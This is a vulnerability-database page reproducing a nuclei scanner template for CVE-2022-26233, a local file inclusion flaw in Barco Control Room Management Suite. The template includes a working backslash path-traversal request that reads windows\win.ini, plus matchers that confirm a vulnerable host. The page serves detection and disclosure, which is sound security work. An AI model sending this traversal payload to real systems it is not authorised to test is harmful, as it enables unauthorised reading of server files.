Lucene search

K

Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion

🗓️ 05 May 2022 01:44:55Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

Barco Control Room Management Suite <=2.9 - Local File Inclusion vulnerability allowing unauthorized access to sensitive file

Show more
Related
Refs
Code
id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
  reference:
    - https://0day.today/exploit/37579
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26233
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
    epss-score: 0.00628
    epss-percentile: 0.78973
    cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: barco
    product: control_room_management_suite
  tags: cve,cve2022,barco,lfi,seclists,packetstorm

http:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a00463044022028eab71e6341026afe116eb9241a68c38d744985d87bdb2c299aa5902fb992660220563c5f551edd0f849549b2fbef53453359ed9b8cf6b13e77cc5d4dfd16742884:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 May 2022 01:55Current
7.3High risk
Vulners AI Score7.3
CVSS25
CVSS37.5
EPSS0.014
20
.json
Report